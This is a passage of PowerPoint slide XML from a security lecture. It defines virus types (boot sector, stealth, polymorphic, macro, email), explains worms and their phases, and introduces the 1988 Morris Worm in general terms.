      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="964611" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Attaches to a program that stays in memory, or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Detaches from a program to become memory resident;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Running in the background, it can infect any / every program that executes.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965634" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Boot Sector Virus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="965635" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>ower-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>n-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>elf-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>est sequence that is stored in the motherboard PROM is executed every time a PC is reset / switched on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Final thing it does is to load the first sector from the floppy disk / hard disk / CD and execute the code contained in it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Normally this is a bootstrap loader for an Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Virus can hijack this loader…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143000" y="152400"/>
            <a:ext cx="6381750" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Previous Lecture..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56322" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>We have studied: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Problem of intrusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Intrusion detection (statistical &amp; rule-based)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Password management</a:t>
            </a:r>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966658" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Stealth Virus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="966659" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Instead of infecting files directly some viruses hide their program code in directories, unused parts of disk etc;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>This still requires a triggering program, but the size of code needed to load the virus is very small;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>These viruses can be very difficult to remove;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>The compression viruses try to hide themselves through retaining the same host file length.</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967682" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Polymorphic Virus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="967683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Most antivirus software detects viruses by matching the virus signature: a fragment of virus code that is unique to that virus (or family of viruses);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Stealth viruses try to hide themselves by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>encrypting themselves, changing the encryption occasionally to prevent detection, and/or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>shuffling code fragments or dummy data;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Antivirus software is now tuned to pick up the decryption sequence or shuffling code itself!</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968706" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Macro Virus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="968707" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1"/>
              <a:t>Macro code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800"/>
              <a:t> attached to some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1"/>
              <a:t>data file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800"/>
              <a:t>Interpreted by program using file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>eg Word/Excel macros,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>esp. using auto command &amp; command macros;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800"/>
              <a:t>Code is now platform independent; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800"/>
              <a:t>Is a major source of new viral infections;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800"/>
              <a:t>Blurs distinction between data and program files; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800"/>
              <a:t>Classic trade-off: "ease of use" vs "security”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800"/>
              <a:t>Are no longer dominant virus threat.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969730" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Portable Code Virus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="969731" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Windows has a ‘Portable Executable’ format file that can be used to execute a program on a number of different operating systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>The Goza virus was the first infector of Portable EXE files (~1997).</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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="6597650" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Email Virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28674" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="1268413"/>
            <a:ext cx="8362950" cy="5132387"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Spread using email with attachment containing a macro virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="10000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>An email virus is activated when user opens the attachment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Or worse, it can be activated when mail is viewed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Hence, email viruses propagate easily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Usually targeted at Microsoft Outlook mail agent &amp; Word/Excel documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="6597650" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29698" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="1196975"/>
            <a:ext cx="5903912" cy="5164138"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Worm usually replicates itself but not infects programs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Widely used by hackers to create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>zombie PC's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>, for further attacks, e.g., DDoS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Typically spreads over a network, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" i="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Morris Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>written by a student at Cornell University, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Robert T. Morries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="10000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>launched in November, 1988 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-AU" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29699" name="Picture 7" descr="File:Robert Tappan Morris.jpg">
            <a:hlinkClick r:id="rId2"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6804025" y="1341438"/>
            <a:ext cx="2232025" cy="2519362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6684963" y="4076700"/>
          <a:ext cx="2459361" cy="792163"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="208286"/>
                <a:gridCol w="2251075"/>
              </a:tblGrid>
              <a:tr h="792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a-IN" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91443" marR="91443" marT="45703" marB="45703"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ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
                        </a:rPr>
                        <a:t>  Robert T. Morries </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="ctr"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ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
                        </a:rPr>
                        <a:t>      (Born: 1965) </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91443" marR="91443" marT="45703" marB="45703" anchor="ctr" horzOverflow="overflow">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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972802" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Operation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Exam question)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="972803" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Worm phases like those of viruses:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>dormant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>propagation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>search for other systems to infect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>establish connection to target remote system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>replicate self onto remote system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>triggering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU"/>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973826" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Morris Worm</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="973827" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
